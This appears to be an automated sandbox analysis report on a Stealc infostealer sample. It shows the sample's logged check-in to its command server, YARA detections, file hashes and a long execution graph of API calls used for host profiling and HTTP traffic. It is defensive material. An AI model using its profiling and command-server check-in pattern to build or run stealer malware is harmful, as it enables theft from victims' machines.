Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 46 42 47 43 41 41 41 41 46 42 4b 45 42 46 48 4a 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 31 39 37 36 39 45 30 42 37 34 46 34 30 33 33 30 36 30 30 37 31 0d 0a 2d 2d 2d 2d 2d 2d 46 42 47 43 41 41 41 41 46 42 4b 45 42 46 48 4a 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 46 42 47 43 41 41 41 41 46 42 4b 45 42 46 48 4a 45 47 43 46 2d 2d 0d 0a
Data Ascii (CRLF line breaks restored from the raw bytes):
------FBGCAAAAFBKEBFHJEGCF
Content-Disposition: form-data; name="hwid"

119769E0B74F4033060071
------FBGCAAAAFBKEBFHJEGCF
Content-Disposition: form-data; name="build"

doma
------FBGCAAAAFBKEBFHJEGCF--
Oct 25, 2024 12:33:22.999056101 CEST | 210 | IN | HTTP/1.1 200 OK
Date: Fri, 25 Oct 2024 10:33:22 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s= (base64 for the string "block"; the C2 answered the hwid/build check-in with this value and the sample sent nothing further on this session)


                            Target ID:0
                            Start time:06:33:15
                            Start date:25/10/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0x930000
                            File size:1'839'104 bytes
                            MD5 hash:E5554752275F657385F52A9200CE5D65
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2257198305.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2216744474.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2257803413.00000000010DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true


                              Execution Graph

                              Execution Coverage:7.1%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:3.2%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:25
14430->14400 14431->14435 14432->14400 14433->14400 14434->14400 14435->13488 14437 947553 GetVolumeInformationA 14436->14437 14438 94754c 14436->14438 14440 947591 14437->14440 14438->14437 14439 9475fc GetProcessHeap RtlAllocateHeap 14441 947628 wsprintfA 14439->14441 14442 947619 14439->14442 14440->14439 14444 94a740 lstrcpy 14441->14444 14443 94a740 lstrcpy 14442->14443 14445 945da7 14443->14445 14444->14445 14445->13509 14447 94a7a0 lstrcpy 14446->14447 14448 934899 14447->14448 15501 9347b0 14448->15501 14450 9348a5 14451 94a740 lstrcpy 14450->14451 14452 9348d7 14451->14452 14453 94a740 lstrcpy 14452->14453 14454 9348e4 14453->14454 14455 94a740 lstrcpy 14454->14455 14456 9348f1 14455->14456 14457 94a740 lstrcpy 14456->14457 14458 9348fe 14457->14458 14459 94a740 lstrcpy 14458->14459 14460 93490b InternetOpenA StrCmpCA 14459->14460 14461 934944 14460->14461 14462 934955 14461->14462 14463 934ecb InternetCloseHandle 14461->14463 15512 948b60 14462->15512 14464 934ee8 14463->14464 15507 939ac0 CryptStringToBinaryA 14464->15507 14466 934963 15520 94a920 14466->15520 14469 934976 14471 94a8a0 lstrcpy 14469->14471 14476 93497f 14471->14476 14472 94a820 2 API calls 14473 934f05 14472->14473 14475 94a9b0 4 API calls 14473->14475 14474 934f27 ctype 14478 94a7a0 lstrcpy 14474->14478 14477 934f1b 14475->14477 14480 94a9b0 4 API calls 14476->14480 14479 94a8a0 lstrcpy 14477->14479 14491 934f57 14478->14491 14479->14474 14481 9349a9 14480->14481 14482 94a8a0 lstrcpy 14481->14482 14483 9349b2 14482->14483 14484 94a9b0 4 API calls 14483->14484 14485 9349d1 14484->14485 14486 94a8a0 lstrcpy 14485->14486 14487 9349da 14486->14487 14488 94a920 3 API calls 14487->14488 14489 9349f8 14488->14489 14490 94a8a0 lstrcpy 14489->14490 14492 934a01 14490->14492 14491->13512 14493 94a9b0 4 API calls 14492->14493 14494 934a20 14493->14494 14495 94a8a0 lstrcpy 14494->14495 14496 934a29 14495->14496 14497 94a9b0 4 API calls 14496->14497 14498 934a48 14497->14498 14499 94a8a0 lstrcpy 
14498->14499 14500 934a51 14499->14500 14501 94a9b0 4 API calls 14500->14501 14502 934a7d 14501->14502 14503 94a920 3 API calls 14502->14503 14504 934a84 14503->14504 14505 94a8a0 lstrcpy 14504->14505 14506 934a8d 14505->14506 14507 934aa3 InternetConnectA 14506->14507 14507->14463 14508 934ad3 HttpOpenRequestA 14507->14508 14510 934b28 14508->14510 14511 934ebe InternetCloseHandle 14508->14511 14512 94a9b0 4 API calls 14510->14512 14511->14463 14513 934b3c 14512->14513 14514 94a8a0 lstrcpy 14513->14514 14515 934b45 14514->14515 14516 94a920 3 API calls 14515->14516 14517 934b63 14516->14517 14518 94a8a0 lstrcpy 14517->14518 14519 934b6c 14518->14519 14520 94a9b0 4 API calls 14519->14520 14521 934b8b 14520->14521 14522 94a8a0 lstrcpy 14521->14522 14523 934b94 14522->14523 14524 94a9b0 4 API calls 14523->14524 14525 934bb5 14524->14525 14526 94a8a0 lstrcpy 14525->14526 14527 934bbe 14526->14527 14528 94a9b0 4 API calls 14527->14528 14529 934bde 14528->14529 14530 94a8a0 lstrcpy 14529->14530 14531 934be7 14530->14531 14532 94a9b0 4 API calls 14531->14532 14533 934c06 14532->14533 14534 94a8a0 lstrcpy 14533->14534 14535 934c0f 14534->14535 14536 94a920 3 API calls 14535->14536 14537 934c2d 14536->14537 14538 94a8a0 lstrcpy 14537->14538 14539 934c36 14538->14539 14540 94a9b0 4 API calls 14539->14540 14541 934c55 14540->14541 14542 94a8a0 lstrcpy 14541->14542 14543 934c5e 14542->14543 14544 94a9b0 4 API calls 14543->14544 14545 934c7d 14544->14545 14546 94a8a0 lstrcpy 14545->14546 14547 934c86 14546->14547 14548 94a920 3 API calls 14547->14548 14549 934ca4 14548->14549 14550 94a8a0 lstrcpy 14549->14550 14551 934cad 14550->14551 14552 94a9b0 4 API calls 14551->14552 14553 934ccc 14552->14553 14554 94a8a0 lstrcpy 14553->14554 14555 934cd5 14554->14555 14556 94a9b0 4 API calls 14555->14556 14557 934cf6 14556->14557 14558 94a8a0 lstrcpy 14557->14558 14559 934cff 14558->14559 14560 94a9b0 4 API calls 14559->14560 14561 934d1f 14560->14561 14562 94a8a0 lstrcpy 14561->14562 
14563 934d28 14562->14563 14564 94a9b0 4 API calls 14563->14564 14565 934d47 14564->14565 14566 94a8a0 lstrcpy 14565->14566 14567 934d50 14566->14567 14568 94a920 3 API calls 14567->14568 14569 934d6e 14568->14569 14570 94a8a0 lstrcpy 14569->14570 14571 934d77 14570->14571 14572 94a740 lstrcpy 14571->14572 14573 934d92 14572->14573 14574 94a920 3 API calls 14573->14574 14575 934db3 14574->14575 14576 94a920 3 API calls 14575->14576 14577 934dba 14576->14577 14578 94a8a0 lstrcpy 14577->14578 14579 934dc6 14578->14579 14580 934de7 lstrlen 14579->14580 14581 934dfa 14580->14581 14582 934e03 lstrlen 14581->14582 15526 94aad0 14582->15526 14584 934e13 HttpSendRequestA 14585 934e32 InternetReadFile 14584->14585 14586 934e67 InternetCloseHandle 14585->14586 14591 934e5e 14585->14591 14589 94a800 14586->14589 14588 94a9b0 4 API calls 14588->14591 14589->14511 14590 94a8a0 lstrcpy 14590->14591 14591->14585 14591->14586 14591->14588 14591->14590 15528 94aad0 14592->15528 14594 9417c4 StrCmpCA 14595 9417d7 14594->14595 14596 9417cf ExitProcess 14594->14596 14597 9419c2 14595->14597 14598 941970 StrCmpCA 14595->14598 14599 9418f1 StrCmpCA 14595->14599 14600 941951 StrCmpCA 14595->14600 14601 941932 StrCmpCA 14595->14601 14602 941913 StrCmpCA 14595->14602 14603 94185d StrCmpCA 14595->14603 14604 94187f StrCmpCA 14595->14604 14605 9418ad StrCmpCA 14595->14605 14606 9418cf StrCmpCA 14595->14606 14607 94a820 lstrlen lstrcpy 14595->14607 14597->13514 14598->14595 14599->14595 14600->14595 14601->14595 14602->14595 14603->14595 14604->14595 14605->14595 14606->14595 14607->14595 14609 94a7a0 lstrcpy 14608->14609 14610 935979 14609->14610 14611 9347b0 2 API calls 14610->14611 14612 935985 14611->14612 14613 94a740 lstrcpy 14612->14613 14614 9359ba 14613->14614 14615 94a740 lstrcpy 14614->14615 14616 9359c7 14615->14616 14617 94a740 lstrcpy 14616->14617 14618 9359d4 14617->14618 14619 94a740 lstrcpy 14618->14619 14620 9359e1 14619->14620 14621 94a740 lstrcpy 14620->14621 14622 9359ee 
InternetOpenA StrCmpCA 14621->14622 14623 935a1d 14622->14623 14624 935fc3 InternetCloseHandle 14623->14624 14625 948b60 3 API calls 14623->14625 14626 935fe0 14624->14626 14627 935a3c 14625->14627 14629 939ac0 4 API calls 14626->14629 14628 94a920 3 API calls 14627->14628 14630 935a4f 14628->14630 14631 935fe6 14629->14631 14632 94a8a0 lstrcpy 14630->14632 14633 94a820 2 API calls 14631->14633 14635 93601f ctype 14631->14635 14637 935a58 14632->14637 14634 935ffd 14633->14634 14636 94a9b0 4 API calls 14634->14636 14639 94a7a0 lstrcpy 14635->14639 14638 936013 14636->14638 14641 94a9b0 4 API calls 14637->14641 14640 94a8a0 lstrcpy 14638->14640 14649 93604f 14639->14649 14640->14635 14642 935a82 14641->14642 14643 94a8a0 lstrcpy 14642->14643 14644 935a8b 14643->14644 14645 94a9b0 4 API calls 14644->14645 14646 935aaa 14645->14646 14647 94a8a0 lstrcpy 14646->14647 14648 935ab3 14647->14648 14650 94a920 3 API calls 14648->14650 14649->13520 14651 935ad1 14650->14651 14652 94a8a0 lstrcpy 14651->14652 14653 935ada 14652->14653 14654 94a9b0 4 API calls 14653->14654 14655 935af9 14654->14655 14656 94a8a0 lstrcpy 14655->14656 14657 935b02 14656->14657 14658 94a9b0 4 API calls 14657->14658 14659 935b21 14658->14659 14660 94a8a0 lstrcpy 14659->14660 14661 935b2a 14660->14661 14662 94a9b0 4 API calls 14661->14662 14663 935b56 14662->14663 14664 94a920 3 API calls 14663->14664 14665 935b5d 14664->14665 14666 94a8a0 lstrcpy 14665->14666 14667 935b66 14666->14667 14668 935b7c InternetConnectA 14667->14668 14668->14624 14669 935bac HttpOpenRequestA 14668->14669 14671 935fb6 InternetCloseHandle 14669->14671 14672 935c0b 14669->14672 14671->14624 14673 94a9b0 4 API calls 14672->14673 14674 935c1f 14673->14674 14675 94a8a0 lstrcpy 14674->14675 14676 935c28 14675->14676 14677 94a920 3 API calls 14676->14677 14678 935c46 14677->14678 14679 94a8a0 lstrcpy 14678->14679 14680 935c4f 14679->14680 14681 94a9b0 4 API calls 14680->14681 14682 935c6e 14681->14682 14683 94a8a0 lstrcpy 
14682->14683 14684 935c77 14683->14684 14685 94a9b0 4 API calls 14684->14685 14686 935c98 14685->14686 14687 94a8a0 lstrcpy 14686->14687 14688 935ca1 14687->14688 14689 94a9b0 4 API calls 14688->14689 14690 935cc1 14689->14690 14691 94a8a0 lstrcpy 14690->14691 14692 935cca 14691->14692 14693 94a9b0 4 API calls 14692->14693 14694 935ce9 14693->14694 14695 94a8a0 lstrcpy 14694->14695 14696 935cf2 14695->14696 14697 94a920 3 API calls 14696->14697 14698 935d10 14697->14698 14699 94a8a0 lstrcpy 14698->14699 14700 935d19 14699->14700 14701 94a9b0 4 API calls 14700->14701 14702 935d38 14701->14702 14703 94a8a0 lstrcpy 14702->14703 14704 935d41 14703->14704 14705 94a9b0 4 API calls 14704->14705 14706 935d60 14705->14706 14707 94a8a0 lstrcpy 14706->14707 14708 935d69 14707->14708 14709 94a920 3 API calls 14708->14709 14710 935d87 14709->14710 14711 94a8a0 lstrcpy 14710->14711 14712 935d90 14711->14712 14713 94a9b0 4 API calls 14712->14713 14714 935daf 14713->14714 14715 94a8a0 lstrcpy 14714->14715 14716 935db8 14715->14716 14717 94a9b0 4 API calls 14716->14717 14718 935dd9 14717->14718 14719 94a8a0 lstrcpy 14718->14719 14720 935de2 14719->14720 14721 94a9b0 4 API calls 14720->14721 14722 935e02 14721->14722 14723 94a8a0 lstrcpy 14722->14723 14724 935e0b 14723->14724 14725 94a9b0 4 API calls 14724->14725 14726 935e2a 14725->14726 14727 94a8a0 lstrcpy 14726->14727 14728 935e33 14727->14728 14729 94a920 3 API calls 14728->14729 14730 935e54 14729->14730 14731 94a8a0 lstrcpy 14730->14731 14732 935e5d 14731->14732 14733 935e70 lstrlen 14732->14733 15529 94aad0 14733->15529 14735 935e81 lstrlen GetProcessHeap RtlAllocateHeap 15530 94aad0 14735->15530 14737 935eae lstrlen 14738 935ebe 14737->14738 14739 935ed7 lstrlen 14738->14739 14740 935ee7 14739->14740 14741 935ef0 lstrlen 14740->14741 14742 935f04 14741->14742 14743 935f1a lstrlen 14742->14743 15531 94aad0 14743->15531 14745 935f2a HttpSendRequestA 14746 935f35 InternetReadFile 14745->14746 14747 935f6a InternetCloseHandle 
14746->14747 14751 935f61 14746->14751 14747->14671 14749 94a9b0 4 API calls 14749->14751 14750 94a8a0 lstrcpy 14750->14751 14751->14746 14751->14747 14751->14749 14751->14750 14753 941077 14752->14753 14754 941151 14753->14754 14755 94a820 lstrlen lstrcpy 14753->14755 14754->13522 14755->14753 14757 940db7 14756->14757 14758 940ea4 StrCmpCA 14757->14758 14759 940e27 StrCmpCA 14757->14759 14760 940e67 StrCmpCA 14757->14760 14761 940f17 14757->14761 14762 94a820 lstrlen lstrcpy 14757->14762 14758->14757 14759->14757 14760->14757 14761->13530 14762->14757 14766 940f67 14763->14766 14764 941044 14764->13538 14765 940fb2 StrCmpCA 14765->14766 14766->14764 14766->14765 14767 94a820 lstrlen lstrcpy 14766->14767 14767->14766 14769 94a740 lstrcpy 14768->14769 14770 941a26 14769->14770 14771 94a9b0 4 API calls 14770->14771 14772 941a37 14771->14772 14773 94a8a0 lstrcpy 14772->14773 14774 941a40 14773->14774 14775 94a9b0 4 API calls 14774->14775 14776 941a5b 14775->14776 14777 94a8a0 lstrcpy 14776->14777 14778 941a64 14777->14778 14779 94a9b0 4 API calls 14778->14779 14780 941a7d 14779->14780 14781 94a8a0 lstrcpy 14780->14781 14782 941a86 14781->14782 14783 94a9b0 4 API calls 14782->14783 14784 941aa1 14783->14784 14785 94a8a0 lstrcpy 14784->14785 14786 941aaa 14785->14786 14787 94a9b0 4 API calls 14786->14787 14788 941ac3 14787->14788 14789 94a8a0 lstrcpy 14788->14789 14790 941acc 14789->14790 14791 94a9b0 4 API calls 14790->14791 14792 941ae7 14791->14792 14793 94a8a0 lstrcpy 14792->14793 14794 941af0 14793->14794 14795 94a9b0 4 API calls 14794->14795 14796 941b09 14795->14796 14797 94a8a0 lstrcpy 14796->14797 14798 941b12 14797->14798 14799 94a9b0 4 API calls 14798->14799 14800 941b2d 14799->14800 14801 94a8a0 lstrcpy 14800->14801 14802 941b36 14801->14802 14803 94a9b0 4 API calls 14802->14803 14804 941b4f 14803->14804 14805 94a8a0 lstrcpy 14804->14805 14806 941b58 14805->14806 14807 94a9b0 4 API calls 14806->14807 14808 941b76 14807->14808 14809 94a8a0 lstrcpy 
14808->14809 14810 941b7f 14809->14810 14811 947500 6 API calls 14810->14811 14812 941b96 14811->14812 14813 94a920 3 API calls 14812->14813 14814 941ba9 14813->14814 14815 94a8a0 lstrcpy 14814->14815 14816 941bb2 14815->14816 14817 94a9b0 4 API calls 14816->14817 14818 941bdc 14817->14818 14819 94a8a0 lstrcpy 14818->14819 14820 941be5 14819->14820 14821 94a9b0 4 API calls 14820->14821 14822 941c05 14821->14822 14823 94a8a0 lstrcpy 14822->14823 14824 941c0e 14823->14824 15532 947690 GetProcessHeap RtlAllocateHeap 14824->15532 14827 94a9b0 4 API calls 14828 941c2e 14827->14828 14829 94a8a0 lstrcpy 14828->14829 14830 941c37 14829->14830 14831 94a9b0 4 API calls 14830->14831 14832 941c56 14831->14832 14833 94a8a0 lstrcpy 14832->14833 14834 941c5f 14833->14834 14835 94a9b0 4 API calls 14834->14835 14836 941c80 14835->14836 14837 94a8a0 lstrcpy 14836->14837 14838 941c89 14837->14838 15539 9477c0 GetCurrentProcess IsWow64Process 14838->15539 14841 94a9b0 4 API calls 14842 941ca9 14841->14842 14843 94a8a0 lstrcpy 14842->14843 14844 941cb2 14843->14844 14845 94a9b0 4 API calls 14844->14845 14846 941cd1 14845->14846 14847 94a8a0 lstrcpy 14846->14847 14848 941cda 14847->14848 14849 94a9b0 4 API calls 14848->14849 14850 941cfb 14849->14850 14851 94a8a0 lstrcpy 14850->14851 14852 941d04 14851->14852 14853 947850 3 API calls 14852->14853 14854 941d14 14853->14854 14855 94a9b0 4 API calls 14854->14855 14856 941d24 14855->14856 14857 94a8a0 lstrcpy 14856->14857 14858 941d2d 14857->14858 14859 94a9b0 4 API calls 14858->14859 14860 941d4c 14859->14860 14861 94a8a0 lstrcpy 14860->14861 14862 941d55 14861->14862 14863 94a9b0 4 API calls 14862->14863 14864 941d75 14863->14864 14865 94a8a0 lstrcpy 14864->14865 14866 941d7e 14865->14866 14867 9478e0 3 API calls 14866->14867 14868 941d8e 14867->14868 14869 94a9b0 4 API calls 14868->14869 14870 941d9e 14869->14870 14871 94a8a0 lstrcpy 14870->14871 14872 941da7 14871->14872 14873 94a9b0 4 API calls 14872->14873 14874 941dc6 14873->14874 
14875 94a8a0 lstrcpy 14874->14875 14876 941dcf 14875->14876 14877 94a9b0 4 API calls 14876->14877 14878 941df0 14877->14878 14879 94a8a0 lstrcpy 14878->14879 14880 941df9 14879->14880 15541 947980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14880->15541 14883 94a9b0 4 API calls 14884 941e19 14883->14884 14885 94a8a0 lstrcpy 14884->14885 14886 941e22 14885->14886 14887 94a9b0 4 API calls 14886->14887 14888 941e41 14887->14888 14889 94a8a0 lstrcpy 14888->14889 14890 941e4a 14889->14890 14891 94a9b0 4 API calls 14890->14891 14892 941e6b 14891->14892 14893 94a8a0 lstrcpy 14892->14893 14894 941e74 14893->14894 15543 947a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14894->15543 14897 94a9b0 4 API calls 14898 941e94 14897->14898 14899 94a8a0 lstrcpy 14898->14899 14900 941e9d 14899->14900 14901 94a9b0 4 API calls 14900->14901 14902 941ebc 14901->14902 14903 94a8a0 lstrcpy 14902->14903 14904 941ec5 14903->14904 14905 94a9b0 4 API calls 14904->14905 14906 941ee5 14905->14906 14907 94a8a0 lstrcpy 14906->14907 14908 941eee 14907->14908 15546 947b00 GetUserDefaultLocaleName 14908->15546 14911 94a9b0 4 API calls 14912 941f0e 14911->14912 14913 94a8a0 lstrcpy 14912->14913 14914 941f17 14913->14914 14915 94a9b0 4 API calls 14914->14915 14916 941f36 14915->14916 14917 94a8a0 lstrcpy 14916->14917 14918 941f3f 14917->14918 14919 94a9b0 4 API calls 14918->14919 14920 941f60 14919->14920 14921 94a8a0 lstrcpy 14920->14921 14922 941f69 14921->14922 15550 947b90 14922->15550 14924 941f80 14925 94a920 3 API calls 14924->14925 14926 941f93 14925->14926 14927 94a8a0 lstrcpy 14926->14927 14928 941f9c 14927->14928 14929 94a9b0 4 API calls 14928->14929 14930 941fc6 14929->14930 14931 94a8a0 lstrcpy 14930->14931 14932 941fcf 14931->14932 14933 94a9b0 4 API calls 14932->14933 14934 941fef 14933->14934 14935 94a8a0 lstrcpy 14934->14935 14936 941ff8 14935->14936 15562 947d80 GetSystemPowerStatus 14936->15562 14939 94a9b0 4 API calls 14940 942018 14939->14940 14941 94a8a0 
lstrcpy 14940->14941 14942 942021 14941->14942 14943 94a9b0 4 API calls 14942->14943 14944 942040 14943->14944 14945 94a8a0 lstrcpy 14944->14945 14946 942049 14945->14946 14947 94a9b0 4 API calls 14946->14947 14948 94206a 14947->14948 14949 94a8a0 lstrcpy 14948->14949 14950 942073 14949->14950 14951 94207e GetCurrentProcessId 14950->14951 15564 949470 OpenProcess 14951->15564 14954 94a920 3 API calls 14955 9420a4 14954->14955 14956 94a8a0 lstrcpy 14955->14956 14957 9420ad 14956->14957 14958 94a9b0 4 API calls 14957->14958 14959 9420d7 14958->14959 14960 94a8a0 lstrcpy 14959->14960 14961 9420e0 14960->14961 14962 94a9b0 4 API calls 14961->14962 14963 942100 14962->14963 14964 94a8a0 lstrcpy 14963->14964 14965 942109 14964->14965 15569 947e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14965->15569 14968 94a9b0 4 API calls 14969 942129 14968->14969 14970 94a8a0 lstrcpy 14969->14970 14971 942132 14970->14971 14972 94a9b0 4 API calls 14971->14972 14973 942151 14972->14973 14974 94a8a0 lstrcpy 14973->14974 14975 94215a 14974->14975 14976 94a9b0 4 API calls 14975->14976 14977 94217b 14976->14977 14978 94a8a0 lstrcpy 14977->14978 14979 942184 14978->14979 15573 947f60 14979->15573 14982 94a9b0 4 API calls 14983 9421a4 14982->14983 14984 94a8a0 lstrcpy 14983->14984 14985 9421ad 14984->14985 14986 94a9b0 4 API calls 14985->14986 14987 9421cc 14986->14987 14988 94a8a0 lstrcpy 14987->14988 14989 9421d5 14988->14989 14990 94a9b0 4 API calls 14989->14990 14991 9421f6 14990->14991 14992 94a8a0 lstrcpy 14991->14992 14993 9421ff 14992->14993 15586 947ed0 GetSystemInfo wsprintfA 14993->15586 14996 94a9b0 4 API calls 14997 94221f 14996->14997 14998 94a8a0 lstrcpy 14997->14998 14999 942228 14998->14999 15000 94a9b0 4 API calls 14999->15000 15001 942247 15000->15001 15002 94a8a0 lstrcpy 15001->15002 15003 942250 15002->15003 15004 94a9b0 4 API calls 15003->15004 15005 942270 15004->15005 15006 94a8a0 lstrcpy 15005->15006 15007 942279 15006->15007 15588 948100 GetProcessHeap 
RtlAllocateHeap 15007->15588 15010 94a9b0 4 API calls 15011 942299 15010->15011 15012 94a8a0 lstrcpy 15011->15012 15013 9422a2 15012->15013 15014 94a9b0 4 API calls 15013->15014 15015 9422c1 15014->15015 15016 94a8a0 lstrcpy 15015->15016 15017 9422ca 15016->15017 15018 94a9b0 4 API calls 15017->15018 15019 9422eb 15018->15019 15020 94a8a0 lstrcpy 15019->15020 15021 9422f4 15020->15021 15594 9487c0 15021->15594 15024 94a920 3 API calls 15025 94231e 15024->15025 15026 94a8a0 lstrcpy 15025->15026 15027 942327 15026->15027 15028 94a9b0 4 API calls 15027->15028 15029 942351 15028->15029 15030 94a8a0 lstrcpy 15029->15030 15031 94235a 15030->15031 15032 94a9b0 4 API calls 15031->15032 15033 94237a 15032->15033 15034 94a8a0 lstrcpy 15033->15034 15035 942383 15034->15035 15036 94a9b0 4 API calls 15035->15036 15037 9423a2 15036->15037 15038 94a8a0 lstrcpy 15037->15038 15039 9423ab 15038->15039 15599 9481f0 15039->15599 15041 9423c2 15042 94a920 3 API calls 15041->15042 15043 9423d5 15042->15043 15044 94a8a0 lstrcpy 15043->15044 15045 9423de 15044->15045 15046 94a9b0 4 API calls 15045->15046 15047 94240a 15046->15047 15048 94a8a0 lstrcpy 15047->15048 15049 942413 15048->15049 15050 94a9b0 4 API calls 15049->15050 15051 942432 15050->15051 15052 94a8a0 lstrcpy 15051->15052 15053 94243b 15052->15053 15054 94a9b0 4 API calls 15053->15054 15055 94245c 15054->15055 15056 94a8a0 lstrcpy 15055->15056 15057 942465 15056->15057 15058 94a9b0 4 API calls 15057->15058 15059 942484 15058->15059 15060 94a8a0 lstrcpy 15059->15060 15061 94248d 15060->15061 15062 94a9b0 4 API calls 15061->15062 15063 9424ae 15062->15063 15064 94a8a0 lstrcpy 15063->15064 15065 9424b7 15064->15065 15607 948320 15065->15607 15067 9424d3 15068 94a920 3 API calls 15067->15068 15069 9424e6 15068->15069 15070 94a8a0 lstrcpy 15069->15070 15071 9424ef 15070->15071 15072 94a9b0 4 API calls 15071->15072 15073 942519 15072->15073 15074 94a8a0 lstrcpy 15073->15074 15075 942522 15074->15075 15076 94a9b0 4 API calls 
15075->15076 15077 942543 15076->15077 15078 94a8a0 lstrcpy 15077->15078 15079 94254c 15078->15079 15080 948320 17 API calls 15079->15080 15081 942568 15080->15081 15082 94a920 3 API calls 15081->15082 15083 94257b 15082->15083 15084 94a8a0 lstrcpy 15083->15084 15085 942584 15084->15085 15086 94a9b0 4 API calls 15085->15086 15087 9425ae 15086->15087 15088 94a8a0 lstrcpy 15087->15088 15089 9425b7 15088->15089 15090 94a9b0 4 API calls 15089->15090 15091 9425d6 15090->15091 15092 94a8a0 lstrcpy 15091->15092 15093 9425df 15092->15093 15094 94a9b0 4 API calls 15093->15094 15095 942600 15094->15095 15096 94a8a0 lstrcpy 15095->15096 15097 942609 15096->15097 15643 948680 15097->15643 15099 942620 15100 94a920 3 API calls 15099->15100 15101 942633 15100->15101 15102 94a8a0 lstrcpy 15101->15102 15103 94263c 15102->15103 15104 94265a lstrlen 15103->15104 15105 94266a 15104->15105 15106 94a740 lstrcpy 15105->15106 15107 94267c 15106->15107 15108 931590 lstrcpy 15107->15108 15109 94268d 15108->15109 15653 945190 15109->15653 15111 942699 15111->13542 15841 94aad0 15112->15841 15114 935009 InternetOpenUrlA 15118 935021 15114->15118 15115 9350a0 InternetCloseHandle InternetCloseHandle 15117 9350ec 15115->15117 15116 93502a InternetReadFile 15116->15118 15117->13546 15118->15115 15118->15116 15842 9398d0 15119->15842 15121 940759 15122 94077d 15121->15122 15123 940a38 15121->15123 15126 940799 StrCmpCA 15122->15126 15124 931590 lstrcpy 15123->15124 15125 940a49 15124->15125 16018 940250 15125->16018 15128 9407a8 15126->15128 15154 940843 15126->15154 15130 94a7a0 lstrcpy 15128->15130 15132 9407c3 15130->15132 15131 940865 StrCmpCA 15134 940874 15131->15134 15171 94096b 15131->15171 15133 931590 lstrcpy 15132->15133 15135 94080c 15133->15135 15136 94a740 lstrcpy 15134->15136 15137 94a7a0 lstrcpy 15135->15137 15139 940881 15136->15139 15140 940823 15137->15140 15138 94099c StrCmpCA 15141 9409ab 15138->15141 15160 940a2d 15138->15160 15142 94a9b0 4 API calls 15139->15142 15143 
94a7a0 lstrcpy 15140->15143 15144 931590 lstrcpy 15141->15144 15145 9408ac 15142->15145 15147 94083e 15143->15147 15148 9409f4 15144->15148 15146 94a920 3 API calls 15145->15146 15149 9408b3 15146->15149 15845 93fb00 15147->15845 15151 94a7a0 lstrcpy 15148->15151 15153 94a9b0 4 API calls 15149->15153 15152 940a0d 15151->15152 15155 94a7a0 lstrcpy 15152->15155 15156 9408ba 15153->15156 15154->15131 15157 940a28 15155->15157 15158 94a8a0 lstrcpy 15156->15158 15160->13550 15171->15138 15493 94a7a0 lstrcpy 15492->15493 15494 931683 15493->15494 15495 94a7a0 lstrcpy 15494->15495 15496 931695 15495->15496 15497 94a7a0 lstrcpy 15496->15497 15498 9316a7 15497->15498 15499 94a7a0 lstrcpy 15498->15499 15500 9315a3 15499->15500 15500->14373 15502 9347c6 15501->15502 15503 934838 lstrlen 15502->15503 15527 94aad0 15503->15527 15505 934848 InternetCrackUrlA 15506 934867 15505->15506 15506->14450 15508 934eee 15507->15508 15509 939af9 LocalAlloc 15507->15509 15508->14472 15508->14474 15509->15508 15510 939b14 CryptStringToBinaryA 15509->15510 15510->15508 15511 939b39 LocalFree 15510->15511 15511->15508 15513 94a740 lstrcpy 15512->15513 15514 948b74 15513->15514 15515 94a740 lstrcpy 15514->15515 15516 948b82 GetSystemTime 15515->15516 15518 948b99 15516->15518 15517 94a7a0 lstrcpy 15519 948bfc 15517->15519 15518->15517 15519->14466 15521 94a931 15520->15521 15522 94a988 15521->15522 15525 94a968 lstrcpy lstrcat 15521->15525 15523 94a7a0 lstrcpy 15522->15523 15524 94a994 15523->15524 15524->14469 15525->15522 15526->14584 15527->15505 15528->14594 15529->14735 15530->14737 15531->14745 15660 9477a0 15532->15660 15535 9476c6 RegOpenKeyExA 15537 947704 RegCloseKey 15535->15537 15538 9476e7 RegQueryValueExA 15535->15538 15536 941c1e 15536->14827 15537->15536 15538->15537 15540 941c99 15539->15540 15540->14841 15542 941e09 15541->15542 15542->14883 15544 941e84 15543->15544 15545 947a9a wsprintfA 15543->15545 15544->14897 15545->15544 15547 941efe 15546->15547 15548 947b4d 
